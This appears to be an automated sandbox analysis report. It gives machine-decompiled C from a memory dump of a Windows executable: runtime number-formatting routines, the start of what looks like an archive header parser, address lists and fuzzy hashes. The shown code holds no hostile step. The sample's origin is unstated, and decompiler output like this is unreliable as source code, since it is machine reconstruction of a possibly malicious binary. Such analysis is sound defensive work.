                																	if(_t1257 == _t1165) {
                																		 *(_t1273 + _t1257 * 4 - 0x740) =  *(_t1273 + _t1257 * 4 - 0x740) & _t937;
                																		_t338 = _t1257 + 1; // 0x1
                																		_t1165 = _t338;
                																		_v1864 = _t1165;
                																	}
                																	goto L176;
                																}
                																goto L181;
                																L176:
                																_t1257 = _t1257 + 1;
                																__eflags = _t1257 - _t1105;
                															} while (_t1257 != _t1105);
                															goto L177;
                														}
                													} else {
                														_t1215 = _v932;
                														_v936 = _t1105;
                														E00CCAA64( &_v932, _t1064,  &_v1396, _t1105 << 2);
                														_t1279 =  &(_t1279[4]);
                														__eflags = _t1215;
                														if(_t1215 != 0) {
                															__eflags = _t1215 - 1;
                															if(_t1215 == 1) {
                																goto L180;
                															} else {
                																__eflags = _v936;
                																if(_v936 == 0) {
                																	goto L180;
                																} else {
                																	_t1107 = 0;
                																	_v1884 = _v936;
                																	_t1258 = 0;
                																	__eflags = 0;
                																	do {
                																		_t958 = _t1215;
                																		_t1166 = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) >> 0x20;
                																		 *(_t1273 + _t1258 * 4 - 0x3a0) = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) + _t1107;
                																		asm("adc edx, 0x0");
                																		_t1258 = _t1258 + 1;
                																		_t1107 = _t1166;
                																		__eflags = _t1258 - _v1884;
                																	} while (_t1258 != _v1884);
                																	goto L149;
                																}
                															}
                														} else {
                															_v1400 = 0;
                															_v936 = 0;
                															_push(0);
                															_t930 =  &_v1396;
                															goto L179;
                														}
                													}
                												} else {
                													_t1216 = _v1396;
                													__eflags = _t1216;
                													if(_t1216 != 0) {
                														__eflags = _t1216 - 1;
                														if(_t1216 == 1) {
                															goto L180;
                														} else {
                															__eflags = _v936;
                															if(_v936 == 0) {
                																goto L180;
                															} else {
                																_t1108 = 0;
                																_v1884 = _v936;
                																_t1259 = 0;
                																__eflags = 0;
                																do {
                																	_t965 = _t1216;
                																	_t1167 = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) >> 0x20;
                																	 *(_t1273 + _t1259 * 4 - 0x3a0) = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) + _t1108;
                																	asm("adc edx, 0x0");
                																	_t1259 = _t1259 + 1;
                																	_t1108 = _t1167;
                																	__eflags = _t1259 - _v1884;
                																} while (_t1259 != _v1884);
                																L149:
                																__eflags = _t1107;
                																if(_t1107 == 0) {
                																	goto L180;
                																} else {
                																	_t961 = _v936;
                																	__eflags = _t961 - 0x73;
                																	if(_t961 < 0x73) {
                																		 *(_t1273 + _t961 * 4 - 0x3a0) = _t1107;
                																		_v936 = _v936 + 1;
                																		goto L180;
                																	} else {
                																		_v1400 = 0;
                																		_v936 = 0;
                																		_push(0);
                																		_t940 =  &_v1396;
                																		L188:
                																		_push(_t940);
                																		_push(_t1064);
                																		_push( &_v932);
                																		E00CCAA64();
                																		_t1279 =  &(_t1279[4]);
                																		_t933 = 0;
                																	}
                																}
                															}
                														}
                													} else {
                														_t929 = 0;
                														_v1864 = 0;
                														_v936 = 0;
                														L178:
                														_push(_t929);
                														_t930 =  &_v1860;
                														L179:
                														_push(_t930);
                														_push(_t1064);
                														_push( &_v932);
                														E00CCAA64();
                														_t1279 =  &(_t1279[4]);
                														L180:
                														_t933 = 1;
                													}
                												}
                												L181:
                												__eflags = _t933;
                												if(_t933 == 0) {
                													_v2408 = _v2408 & 0x00000000;
                													_t404 =  &_v936;
                													 *_t404 = _v936 & 0x00000000;
                													__eflags =  *_t404;
                													_push(0);
                													L190:
                													_push( &_v2404);
                													_t852 =  &_v932;
                													L262:
                													_push(_t1064);
                													_push(_t852);
                													E00CCAA64();
                													_t1279 =  &(_t1279[4]);
                												} else {
                													goto L182;
                												}
                												goto L263;
                												L182:
                												_t908 = _v1908 - _v1888;
                												__eflags = _t908;
                												_v1908 = _t908;
                											} while (_t908 != 0);
                											_t1102 = _v1896;
                											goto L184;
                										}
                									}
                									L263:
                									_t1196 = _v1920;
                									_t1245 = _t1196;
                									_t1086 = _v472;
                									_v1872 = _t1245;
                									__eflags = _t1086;
                									if(_t1086 != 0) {
                										_t1249 = 0;
                										_t1200 = 0;
                										__eflags = 0;
                										do {
                											_t841 =  *(_t1273 + _t1200 * 4 - 0x1d0);
                											_t1153 = 0xa;
                											_t1154 = _t841 * _t1153 >> 0x20;
                											 *(_t1273 + _t1200 * 4 - 0x1d0) = _t841 * _t1153 + _t1249;
                											asm("adc edx, 0x0");
                											_t1200 = _t1200 + 1;
                											_t1249 = _t1154;
                											__eflags = _t1200 - _t1086;
                										} while (_t1200 != _t1086);
                										_v1896 = _t1249;
                										__eflags = _t1249;
                										_t1245 = _v1872;
                										if(_t1249 != 0) {
                											_t1095 = _v472;
                											__eflags = _t1095 - 0x73;
                											if(_t1095 >= 0x73) {
                												__eflags = 0;
                												_v2408 = 0;
                												_v472 = 0;
                												E00CCAA64( &_v468, _t1064,  &_v2404, 0);
                												_t1279 =  &(_t1279[4]);
                											} else {
                												 *(_t1273 + _t1095 * 4 - 0x1d0) = _t1154;
                												_v472 = _v472 + 1;
                											}
                										}
                										_t1196 = _t1245;
                									}
                									_t815 = E00CCC0B0( &_v472,  &_v936);
                									_t1146 = 0xa;
                									__eflags = _t815 - _t1146;
                									if(_t815 != _t1146) {
                										__eflags = _t815;
                										if(_t815 != 0) {
                											_t816 = _t815 + 0x30;
                											__eflags = _t816;
                											_t1245 = _t1196 + 1;
                											 *_t1196 = _t816;
                											_v1872 = _t1245;
                											goto L282;
                										} else {
                											_t817 = _v1904 - 1;
                										}
                									} else {
                										_v1904 = _v1904 + 1;
                										_t1245 = _t1196 + 1;
                										_t832 = _v936;
                										 *_t1196 = 0x31;
                										_v1872 = _t1245;
                										__eflags = _t832;
                										if(_t832 != 0) {
                											_t1199 = 0;
                											_t1248 = _t832;
                											_t1094 = 0;
                											__eflags = 0;
                											do {
                												_t833 =  *(_t1273 + _t1094 * 4 - 0x3a0);
                												 *(_t1273 + _t1094 * 4 - 0x3a0) = _t833 * _t1146 + _t1199;
                												asm("adc edx, 0x0");
                												_t1094 = _t1094 + 1;
                												_t1199 = _t833 * _t1146 >> 0x20;
                												_t1146 = 0xa;
                												__eflags = _t1094 - _t1248;
                											} while (_t1094 != _t1248);
                											_t1245 = _v1872;
                											__eflags = _t1199;
                											if(_t1199 != 0) {
                												_t836 = _v936;
                												__eflags = _t836 - 0x73;
                												if(_t836 >= 0x73) {
                													_v2408 = 0;
                													_v936 = 0;
                													E00CCAA64( &_v932, _t1064,  &_v2404, 0);
                													_t1279 =  &(_t1279[4]);
                												} else {
                													 *(_t1273 + _t836 * 4 - 0x3a0) = _t1199;
                													_v936 = _v936 + 1;
                												}
                											}
                										}
                										L282:
                										_t817 = _v1904;
                									}
                									 *((intOrPtr*)(_v1924 + 4)) = _t817;
                									_t1070 = _v1916;
                									__eflags = _t817;
                									if(_t817 >= 0) {
                										__eflags = _t1070 - 0x7fffffff;
                										if(_t1070 <= 0x7fffffff) {
                											_t1070 = _t1070 + _t817;
                											__eflags = _t1070;
                										}
                									}
                									_t819 = _a24 - 1;
                									__eflags = _t819 - _t1070;
                									if(_t819 >= _t1070) {
                										_t819 = _t1070;
                									}
                									_t755 = _t819 + _v1920;
                									_v1916 = _t755;
                									__eflags = _t1245 - _t755;
                									if(__eflags != 0) {
                										while(1) {
                											_t755 = _v472;
                											__eflags = _t755;
                											if(__eflags == 0) {
                												goto L303;
                											}
                											_t1197 = 0;
                											_t1246 = _t755;
                											_t1090 = 0;
                											__eflags = 0;
                											do {
                												_t820 =  *(_t1273 + _t1090 * 4 - 0x1d0);
                												 *(_t1273 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1197;
                												asm("adc edx, 0x0");
                												_t1090 = _t1090 + 1;
                												_t1197 = _t820 * 0x3b9aca00 >> 0x20;
                												__eflags = _t1090 - _t1246;
                											} while (_t1090 != _t1246);
                											_t1247 = _v1872;
                											__eflags = _t1197;
                											if(_t1197 != 0) {
                												_t826 = _v472;
                												__eflags = _t826 - 0x73;
                												if(_t826 >= 0x73) {
                													__eflags = 0;
                													_v2408 = 0;
                													_v472 = 0;
                													E00CCAA64( &_v468, _t1064,  &_v2404, 0);
                													_t1279 =  &(_t1279[4]);
                												} else {
                													 *(_t1273 + _t826 * 4 - 0x1d0) = _t1197;
                													_v472 = _v472 + 1;
                												}
                											}
                											_t825 = E00CCC0B0( &_v472,  &_v936);
                											_t1198 = 8;
                											_t1070 = _v1916 - _t1247;
                											__eflags = _t1070;
                											do {
                												_t708 = _t825 % _v1912;
                												_t825 = _t825 / _v1912;
                												_t1151 = _t708 + 0x30;
                												__eflags = _t1070 - _t1198;
                												if(_t1070 >= _t1198) {
                													 *((char*)(_t1198 + _t1247)) = _t1151;
                												}
                												_t1198 = _t1198 - 1;
                												__eflags = _t1198 - 0xffffffff;
                											} while (_t1198 != 0xffffffff);
                											__eflags = _t1070 - 9;
                											if(_t1070 > 9) {
                												_t1070 = 9;
                											}
                											_t1245 = _t1247 + _t1070;
                											_v1872 = _t1245;
                											__eflags = _t1245 - _v1916;
                											if(__eflags != 0) {
                												continue;
                											}
                											goto L303;
                										}
                									}
                									L303:
                									 *_t1245 = 0;
                									goto L309;
                								}
                							}
                						}
                					}
                				} else {
                					_t1070 = _t1236 & 0x000fffff;
                					if((_t1188 | _t1236 & 0x000fffff) != 0) {
                						goto L5;
                					} else {
                						_push(0xcd6ac4);
                						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
                						L308:
                						_push(_a24);
                						_push(_t1055);
                						if(E00CC79F6() != 0) {
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							E00CC7DBB();
                							asm("int3");
                							E00CBE2F0(_t1142, 0xcda9e8, 0x10);
                							_v32 = _v32 & 0x00000000;
                							E00CC9931(8);
                							_pop(_t1071);
                							_t721 =  &_v8;
                							 *_t721 = _v8 & 0x00000000;
                							__eflags =  *_t721;
                							_t1237 = 3;
                							while(1) {
                								_v36 = _t1237;
                								__eflags = _t1237 -  *0xd00404; // 0x200
                								if(__eflags == 0) {
                									break;
                								}
                								_t763 =  *0xd00408; // 0x0
                								_t764 =  *(_t763 + _t1237 * 4);
                								__eflags = _t764;
                								if(_t764 != 0) {
                									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
                									if(__eflags != 0) {
                										_t773 =  *0xd00408; // 0x0
                										_push( *((intOrPtr*)(_t773 + _t1237 * 4)));
                										_t774 = E00CCEC83(_t1071, _t1142, __eflags);
                										__eflags = _t774 - 0xffffffff;
                										if(_t774 != 0xffffffff) {
                											_t731 =  &_v32;
                											 *_t731 = _v32 + 1;
                											__eflags =  *_t731;
                										}
                									}
                									_t767 =  *0xd00408; // 0x0
                									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1237 * 4)) + 0x20);
                									_t770 =  *0xd00408; // 0x0
                									E00CC7A50( *((intOrPtr*)(_t770 + _t1237 * 4)));
                									_pop(_t1071);
                									_t772 =  *0xd00408; // 0x0
                									_t737 = _t772 + _t1237 * 4;
                									 *_t737 =  *(_t772 + _t1237 * 4) & 0x00000000;
                									__eflags =  *_t737;
                								}
                								_t1237 = _t1237 + 1;
                							}
                							_v8 = 0xfffffffe;
                							E00CCD991();
                							return E00CBE336(_t1142);
                						} else {
                							L309:
                							_t1286 = _v1936;
                							if(_v1936 != 0) {
                								_t755 = E00CCDFE5(_t1070, _t1286,  &_v1944);
                							}
                							return E00CBE203(_t755, _v8 ^ _t1273);
                						}
                					}
                				}
                			}

                0x00ccd528
                0x00ccd52a
                0x00ccd5f1
                0x00ccd5f8
                0x00ccd5ff
                0x00ccd612
                0x00ccd618
                0x00ccd619
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ccd530
                0x00ccd536
                0x00ccd536
                0x00ccd53c
                0x00ccd53c
                0x00ccd548
                0x00000000
                0x00ccd548
                0x00cccd85
                0x00cccd85
                0x00cccd87
                0x00cccd8d
                0x00cccd8f
                0x00cccd95
                0x00cccd97
                0x00ccd10e
                0x00ccd10e
                0x00ccd110
                0x00ccd116
                0x00ccd11d
                0x00ccd11f
                0x00ccd17e
                0x00ccd181
                0x00ccd187
                0x00ccd18d
                0x00ccd193
                0x00ccd195
                0x00ccd19b
                0x00ccd19d
                0x00ccd19d
                0x00ccd19f
                0x00ccd19f
                0x00ccd1a1
                0x00ccd1aa
                0x00ccd1b1
                0x00ccd1b4
                0x00ccd1b5
                0x00ccd1b7
                0x00ccd1b7
                0x00ccd1bf
                0x00ccd1c1
                0x00ccd1c7
                0x00ccd1cd
                0x00ccd1d0
                0x00000000
                0x00ccd1d6
                0x00ccd1d6
                0x00ccd1dd
                0x00ccd1dd
                0x00ccd1d0
                0x00ccd1c1
                0x00ccd195
                0x00ccd121
                0x00ccd121
                0x00ccd123
                0x00ccd129
                0x00ccd12f
                0x00000000
                0x00ccd12f
                0x00ccd11f
                0x00cccd9d
                0x00cccd9d
                0x00cccd9d
                0x00cccda0
                0x00cccda4
                0x00cccda4
                0x00cccda5
                0x00cccdb7
                0x00cccdc4
                0x00cccdd3
                0x00cccdfd
                0x00ccce02
                0x00ccce08
                0x00ccce0b
                0x00ccce11
                0x00ccce14
                0x00ccce90
                0x00ccce97
                0x00cccf5b
                0x00cccf61
                0x00cccf67
                0x00cccf6a
                0x00cccf6c
                0x00cccff5
                0x00cccf72
                0x00cccf72
                0x00cccf78
                0x00cccf78
                0x00cccf7e
                0x00cccf84
                0x00cccf86
                0x00cccf88
                0x00cccf88
                0x00cccf8e
                0x00cccf94
                0x00cccf96
                0x00cccf9e
                0x00cccf9e
                0x00cccfa4
                0x00cccfa6
                0x00cccfa8
                0x00cccfae
                0x00cccfb0
                0x00ccd0c7
                0x00ccd0c9
                0x00ccd0cf
                0x00ccd0cf
                0x00000000
                0x00cccfb6
                0x00cccfbc
                0x00cccfbc
                0x00cccfbe
                0x00cccfc4
                0x00cccfc7
                0x00cccfce
                0x00cccfd4
                0x00cccfd6
                0x00cccffd
                0x00cccfff
                0x00ccd001
                0x00ccd003
                0x00ccd009
                0x00ccd00f
                0x00ccd0a9
                0x00ccd0a9
                0x00ccd0ac
                0x00000000
                0x00ccd0b2
                0x00ccd0b2
                0x00ccd0b8
                0x00000000
                0x00ccd0b8
                0x00ccd015
                0x00ccd015
                0x00ccd015
                0x00ccd018
                0x00000000
                0x00000000
                0x00ccd01a
                0x00ccd01c
                0x00ccd01e
                0x00ccd027
                0x00ccd027
                0x00ccd029
                0x00ccd02f
                0x00ccd02f
                0x00ccd03b
                0x00ccd046
                0x00ccd049
                0x00ccd056
                0x00ccd059
                0x00ccd05a
                0x00ccd05b
                0x00ccd061
                0x00ccd063
                0x00ccd069
                0x00ccd06f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ccd071
                0x00ccd071
                0x00ccd071
                0x00ccd073
                0x00000000
                0x00000000
                0x00ccd075
                0x00ccd078
                0x00ccd132
                0x00ccd132
                0x00ccd134
                0x00ccd13a
                0x00ccd140
                0x00ccd141
                0x00000000
                0x00ccd07e
                0x00ccd07e
                0x00ccd080
                0x00ccd082
                0x00ccd082
                0x00ccd082
                0x00ccd08a
                0x00ccd08d
                0x00ccd08d
                0x00ccd093
                0x00ccd095
                0x00ccd097
                0x00ccd09e
                0x00ccd0a4
                0x00ccd0a6
                0x00000000
                0x00ccd0a6
                0x00000000
                0x00ccd078
                0x00000000
                0x00ccd071
                0x00000000
                0x00ccd015
                0x00cccfd8
                0x00cccfd8
                0x00cccfda
                0x00cccfe0
                0x00cccfe7
                0x00cccfe7
                0x00cccfea
                0x00cccfea
                0x00000000
                0x00cccfda
                0x00000000
                0x00ccd0be
                0x00ccd0be
                0x00ccd0bf
                0x00ccd0bf
                0x00000000
                0x00cccfc4
                0x00ccce9d
                0x00ccce9d
                0x00ccceaf
                0x00cccebe
                0x00cccec3
                0x00cccec6
                0x00cccec8
                0x00cccee4
                0x00cccee7
                0x00000000
                0x00ccceed
                0x00ccceed
                0x00cccef4
                0x00000000
                0x00cccefa
                0x00cccf00
                0x00cccf02
                0x00cccf08
                0x00cccf08
                0x00cccf0a
                0x00cccf0a
                0x00cccf0c
                0x00cccf15
                0x00cccf1c
                0x00cccf1f
                0x00cccf20
                0x00cccf22
                0x00cccf22
                0x00000000
                0x00cccf0a
                0x00cccef4
                0x00ccceca
                0x00cccecc
                0x00ccced2
                0x00ccced8
                0x00ccced9
                0x00000000
                0x00ccced9
                0x00cccec8
                0x00ccce16
                0x00ccce16
                0x00ccce1c
                0x00ccce1e
                0x00ccce33
                0x00ccce36
                0x00000000
                0x00ccce3c
                0x00ccce3c
                0x00ccce43
                0x00000000
                0x00ccce49
                0x00ccce4f
                0x00ccce51
                0x00ccce57
                0x00ccce57
                0x00ccce59
                0x00ccce59
                0x00ccce5b
                0x00ccce64
                0x00ccce6b
                0x00ccce6e
                0x00ccce6f
                0x00ccce71
                0x00ccce71
                0x00cccf2a
                0x00cccf2a
                0x00cccf2c
                0x00000000
                0x00cccf32
                0x00cccf32
                0x00cccf38
                0x00cccf3b
                0x00ccce7e
                0x00ccce85
                0x00000000
                0x00cccf41
                0x00cccf43
                0x00cccf49
                0x00cccf4f
                0x00cccf50
                0x00ccd147
                0x00ccd147
                0x00ccd14e
                0x00ccd14f
                0x00ccd150
                0x00ccd155
                0x00ccd158
                0x00ccd158
                0x00cccf3b
                0x00cccf2c
                0x00ccce43
                0x00ccce20
                0x00ccce20
                0x00ccce22
                0x00ccce28
                0x00ccd0d2
                0x00ccd0d2
                0x00ccd0d3
                0x00ccd0d9
                0x00ccd0d9
                0x00ccd0e0
                0x00ccd0e1
                0x00ccd0e2
                0x00ccd0e7
                0x00ccd0ea
                0x00ccd0ea
                0x00ccd0ea
                0x00ccce1e
                0x00ccd0ec
                0x00ccd0ec
                0x00ccd0ee
                0x00ccd15c
                0x00ccd163
                0x00ccd163
                0x00ccd163
                0x00ccd16a
                0x00ccd16c
                0x00ccd172
                0x00ccd173
                0x00ccd61f
                0x00ccd61f
                0x00ccd620
                0x00ccd621
                0x00ccd626
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ccd0f0
                0x00ccd0f6
                0x00ccd0f6
                0x00ccd0fc
                0x00ccd0fc
                0x00ccd108
                0x00000000
                0x00ccd108
                0x00cccd97
                0x00ccd629
                0x00ccd629
                0x00ccd62f
                0x00ccd631
                0x00ccd637
                0x00ccd63d
                0x00ccd63f
                0x00ccd641
                0x00ccd643
                0x00ccd643
                0x00ccd645
                0x00ccd645
                0x00ccd64e
                0x00ccd64f
                0x00ccd653
                0x00ccd65a
                0x00ccd65d
                0x00ccd65e
                0x00ccd660
                0x00ccd660
                0x00ccd664
                0x00ccd66a
                0x00ccd66c
                0x00ccd672
                0x00ccd674
                0x00ccd67a
                0x00ccd67d
                0x00ccd690
                0x00ccd693
                0x00ccd699
                0x00ccd6ae
                0x00ccd6b3
                0x00ccd67f
                0x00ccd681
                0x00ccd688
                0x00ccd688
                0x00ccd67d
                0x00ccd6b6
                0x00ccd6b6
                0x00ccd6c6
                0x00ccd6cf
                0x00ccd6d0
                0x00ccd6d2
                0x00ccd769
                0x00ccd76b
                0x00ccd776
                0x00ccd776
                0x00ccd778
                0x00ccd77b
                0x00ccd77d
                0x00000000
                0x00ccd76d
                0x00ccd773
                0x00ccd773
                0x00ccd6d8
                0x00ccd6d8
                0x00ccd6de
                0x00ccd6e1
                0x00ccd6e7
                0x00ccd6ea
                0x00ccd6f0
                0x00ccd6f2
                0x00ccd6f8
                0x00ccd6fa
                0x00ccd6fc
                0x00ccd6fc
                0x00ccd6fe
                0x00ccd6fe
                0x00ccd70b
                0x00ccd712
                0x00ccd715
                0x00ccd716
                0x00ccd718
                0x00ccd719
                0x00ccd719
                0x00ccd71d
                0x00ccd723
                0x00ccd725
                0x00ccd727
                0x00ccd72d
                0x00ccd730
                0x00ccd744
                0x00ccd74a
                0x00ccd75f
                0x00ccd764
                0x00ccd732
                0x00ccd732
                0x00ccd739
                0x00ccd739
                0x00ccd730
                0x00ccd725
                0x00ccd783
                0x00ccd783
                0x00ccd783
                0x00ccd78f
                0x00ccd792
                0x00ccd798
                0x00ccd79a
                0x00ccd79c
                0x00ccd7a2
                0x00ccd7a4
                0x00ccd7a4
                0x00ccd7a4
                0x00ccd7a2
                0x00ccd7a9
                0x00ccd7aa
                0x00ccd7ac
                0x00ccd7ae
                0x00ccd7ae
                0x00ccd7b0
                0x00ccd7b6
                0x00ccd7bc
                0x00ccd7be
                0x00ccd7c4
                0x00ccd7c4
                0x00ccd7ca
                0x00ccd7cc
                0x00000000
                0x00000000
                0x00ccd7d2
                0x00ccd7d4
                0x00ccd7d6
                0x00ccd7d6
                0x00ccd7d8
                0x00ccd7d8
                0x00ccd7e8
                0x00ccd7ef
                0x00ccd7f2
                0x00ccd7f3
                0x00ccd7f5
                0x00ccd7f5
                0x00ccd7f9
                0x00ccd7ff
                0x00ccd801
                0x00ccd803
                0x00ccd809
                0x00ccd80c
                0x00ccd81d
                0x00ccd820
                0x00ccd826
                0x00ccd83b
                0x00ccd840
                0x00ccd80e
                0x00ccd80e
                0x00ccd815
                0x00ccd815
                0x00ccd80c
                0x00ccd851
                0x00ccd860
                0x00ccd861
                0x00ccd861
                0x00ccd863
                0x00ccd865
                0x00ccd865
                0x00ccd86b
                0x00ccd86e
                0x00ccd870
                0x00ccd872
                0x00ccd872
                0x00ccd875
                0x00ccd876
                0x00ccd876
                0x00ccd87b
                0x00ccd87e
                0x00ccd882
                0x00ccd882
                0x00ccd883
                0x00ccd885
                0x00ccd88b
                0x00ccd891
                0x00000000
                0x00000000
                0x00000000
                0x00ccd891
                0x00ccd7c4
                0x00ccd897
                0x00ccd897
                0x00000000
                0x00ccd897
                0x00ccc61c
                0x00ccc613
                0x00ccc60a
                0x00ccc5c1
                0x00ccc5c5
                0x00ccc5cd
                0x00000000
                0x00ccc5cf
                0x00ccc5d5
                0x00ccc5da
                0x00ccd8b6
                0x00ccd8b6
                0x00ccd8b9
                0x00ccd8c4
                0x00ccd8ef
                0x00ccd8f0
                0x00ccd8f1
                0x00ccd8f2
                0x00ccd8f3
                0x00ccd8f4
                0x00ccd8f9
                0x00ccd901
                0x00ccd906
                0x00ccd90c
                0x00ccd911
                0x00ccd912
                0x00ccd912
                0x00ccd912
                0x00ccd918
                0x00ccd919
                0x00ccd919
                0x00ccd91c
                0x00ccd922
                0x00000000
                0x00000000
                0x00ccd924
                0x00ccd929
                0x00ccd92c
                0x00ccd92e
                0x00ccd936
                0x00ccd938
                0x00ccd93a
                0x00ccd93f
                0x00ccd942
                0x00ccd948
                0x00ccd94b
                0x00ccd94d
                0x00ccd94d
                0x00ccd94d
                0x00ccd94d
                0x00ccd94b
                0x00ccd950
                0x00ccd95c
                0x00ccd962
                0x00ccd96a
                0x00ccd96f
                0x00ccd970
                0x00ccd975
                0x00ccd975
                0x00ccd975
                0x00ccd975
                0x00ccd979
                0x00ccd979
                0x00ccd97c
                0x00ccd983
                0x00ccd990
                0x00ccd8c6
                0x00ccd8c6
                0x00ccd8c6
                0x00ccd8d0
                0x00ccd8d9
                0x00ccd8de
                0x00ccd8ec
                0x00ccd8ec
                0x00ccd8c4
                0x00ccc5cd

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: d4b068acd048ee1ea847bb278f09f8b58ea5fc478cf2a9b66c62c79b685e0c71
                • Instruction ID: 9513a71df4fbd0dfe97d2f256d5c32a0c80f0c9528ca54dd63b44997ae5840c4
                • Opcode Fuzzy Hash: d4b068acd048ee1ea847bb278f09f8b58ea5fc478cf2a9b66c62c79b685e0c71
                • Instruction Fuzzy Hash: 5CC24B71E086288FDB25CE28DD80BEAB7B5EB84305F1541EED45EE7240E774AE819F40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E00CA2692(intOrPtr* __ecx, void* __eflags) {
                				void* __ebp;
                				unsigned int _t333;
                				signed int _t337;
                				char _t356;
                				signed short _t363;
                				signed int _t368;
                				signed int _t374;
                				signed char _t376;
                				signed char _t379;
                				char _t396;
                				signed int _t397;
                				signed int _t401;
                				signed char _t415;
                				intOrPtr _t416;
                				char _t417;
                				signed int _t420;
                				signed int _t421;
                				signed char _t426;
                				signed int _t429;
                				signed int _t433;
                				signed short _t438;
                				signed short _t443;
                				unsigned int _t448;
                				signed int _t451;
                				void* _t454;
                				signed int _t456;
                				signed int _t459;
                				void* _t466;
                				signed int _t472;
                				unsigned int _t476;
                				void* _t477;
                				void* _t484;
                				void* _t485;
                				signed char _t491;
                				signed int _t505;
                				intOrPtr* _t518;
                				signed int _t521;
                				signed int _t522;
                				intOrPtr* _t523;
                				signed int _t531;
                				signed int _t536;
                				signed int _t538;
                				unsigned int _t547;
                				signed int _t549;
                				signed int _t560;
                				signed char _t562;
                				signed int _t563;
                				void* _t586;
                				signed int _t590;
                				signed int _t602;
                				signed int _t604;
                				signed int _t606;
                				unsigned int _t612;
                				signed char _t628;
                				signed char _t638;
                				signed int _t641;
                				unsigned int _t642;
                				signed int _t645;
                				signed int _t646;
                				signed int _t648;
                				signed int _t649;
                				unsigned int _t651;
                				signed int _t655;
                				void* _t656;
                				void* _t663;
                				signed int _t666;
                				signed int _t667;
                				signed char _t668;
                				signed int _t671;
                				void* _t673;
                				signed int _t679;
                				signed int _t680;
                				void* _t685;
                				signed int _t686;
                				signed int _t687;
                				signed int _t694;
                				signed int _t695;
                				intOrPtr _t697;
                				void* _t698;
                				signed char _t707;
                
                				_t523 = __ecx;
                				E00CBD870(E00CD1197, _t698);
                				E00CBD940();
                				_t518 = _t523;
                				 *((intOrPtr*)(_t698 + 0x20)) = _t518;
                				E00CAC223(_t698 + 0x24, _t518);
                				 *((intOrPtr*)(_t698 + 0x1c)) = 0;
                				 *((intOrPtr*)(_t698 - 4)) = 0;
                				_t655 = 7;
                				if( *(_t518 + 0x6cbc) == 0) {
                					L6:
                					 *((char*)(_t698 + 0x5f)) = 0;
                					L7:
                					E00CAC42E(_t638, _t655);
                					if( *((intOrPtr*)(_t698 + 0x3c)) != 0) {
                						 *(_t518 + 0x21e4) = E00CAC269(_t698 + 0x24) & 0x0000ffff;
                						 *(_t518 + 0x21f4) = 0;
                						_t679 = E00CAC251(_t698 + 0x24) & 0x000000ff;
                						_t333 = E00CAC269(_t698 + 0x24) & 0x0000ffff;
                						 *(_t518 + 0x21ec) = _t333;
                						 *(_t518 + 0x21f4) = _t333 >> 0x0000000e & 0x00000001;
                						_t531 = E00CAC269(_t698 + 0x24) & 0x0000ffff;
                						 *(_t518 + 0x21f0) = _t531;
                						 *(_t518 + 0x21e8) = _t679;
                						__eflags = _t531 - _t655;
                						if(_t531 >= _t655) {
                							_t680 = _t679 - 0x73;
                							__eflags = _t680;
                							if(_t680 == 0) {
                								 *(_t518 + 0x21e8) = 1;
                							} else {
                								_t694 = _t680 - 1;
                								__eflags = _t694;
                								if(_t694 == 0) {
                									 *(_t518 + 0x21e8) = 2;
                								} else {
                									_t695 = _t694 - 6;
                									__eflags = _t695;
                									if(_t695 == 0) {
                										 *(_t518 + 0x21e8) = 3;
                									} else {
                										__eflags = _t695 == 1;
                										if(_t695 == 1) {
                											 *(_t518 + 0x21e8) = 5;
                										}
                									}
                								}
                							}
                							_t337 =  *(_t518 + 0x21e8);
                							 *(_t518 + 0x21dc) = _t337;
                							__eflags = _t337 - 0x75;
                							if(_t337 != 0x75) {
                								__eflags = _t337 - 1;
                								if(_t337 != 1) {
                									L23:
                									_push(_t531 - 7);
                									L24:
                									E00CAC42E(_t638);
                									 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca0)) + E00CA1901(_t518,  *(_t518 + 0x21f0));
                									_t536 =  *(_t518 + 0x21e8);
                									asm("adc eax, 0x0");
                									 *(_t518 + 0x6cac) =  *(_t518 + 0x6ca4);
                									 *(_t698 + 0x50) = _t536;
                									__eflags = _t536 - 1;
                									if(__eflags == 0) {
                										_t656 = _t518 + 0x2208;
                										E00CAA96C(_t656);
                										_t538 = 5;
                										memcpy(_t656, _t518 + 0x21e4, _t538 << 2);
                										 *(_t518 + 0x221c) = E00CAC269(_t698 + 0x24);
                										_t638 = E00CAC29E(_t698 + 0x24);
                										 *(_t518 + 0x2220) = _t638;
                										 *(_t518 + 0x6cb5) =  *(_t518 + 0x2210) & 0x00000001;
                										 *(_t518 + 0x6cb4) =  *(_t518 + 0x2210) >> 0x00000003 & 0x00000001;
                										_t547 =  *(_t518 + 0x2210);
                										 *(_t518 + 0x6cb7) = _t547 >> 0x00000002 & 0x00000001;
                										 *(_t518 + 0x6cbb) = _t547 >> 0x00000006 & 0x00000001;
                										 *(_t518 + 0x6cbc) = _t547 >> 0x00000007 & 0x00000001;
                										__eflags = _t638;
                										if(_t638 != 0) {
                											L119:
                											_t356 = 1;
